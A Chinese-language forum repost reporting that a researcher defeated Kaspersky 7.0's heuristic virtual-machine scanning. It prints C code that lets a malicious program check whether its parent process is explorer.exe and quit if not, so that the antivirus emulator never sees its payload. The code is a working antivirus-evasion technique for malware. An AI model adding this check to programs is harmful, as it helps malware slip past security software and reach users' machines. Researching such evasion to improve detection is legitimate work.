卡巴斯基高級虛擬機啟發式查毒技術被中國黑客攻破(轉微風)
http://bbs.wefong.com/viewthread.php...extra=page%3D1
11月9日,中國著名黑客xyzreg(著名的安全漏洞、安全軟件研究者,曾在中國安全第一峰會 -- 安全焦點2007峰會上做新型惡意軟件技術相關的議題演講,演講中演示了如何穿透卡巴斯基、諾頓、Mcafee等安全軟件的主動防禦體系等內容)在其BLOG上發表了一篇如何攻破卡巴斯基7.0的 「新型高級虛擬機啟髮式查毒技術」的文章,並提供了相應代碼。
代碼可以檢測惡意程序自身是否在卡巴斯基7.0的虛擬機中運行,如果發現被卡巴斯基的虛擬機運行,則自動退出,從而使卡巴斯基無法發現程序中包含的惡意代碼。
破解代碼如下:
DWORD fpid,epid;
void VMM()
{
PROCESSENTRY32 pe;
HANDLE hkz=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if (Process32First(hkz,&pe))
{
do
{
if (pe.th32ProcessID==GetCurrentProcessId())
{
fpid=pe.th32ParentProcessID;
}
if (stricmp(pe.szExeFile,"explorer.exe")==0)
{
epid=pe.th32ProcessID;
}
}
while(Process32Next(hkz,&pe));
}
}
主函數里:
VMM();
if(fpid!=epid)
return 0;
 |
回覆時引用此文章
書籤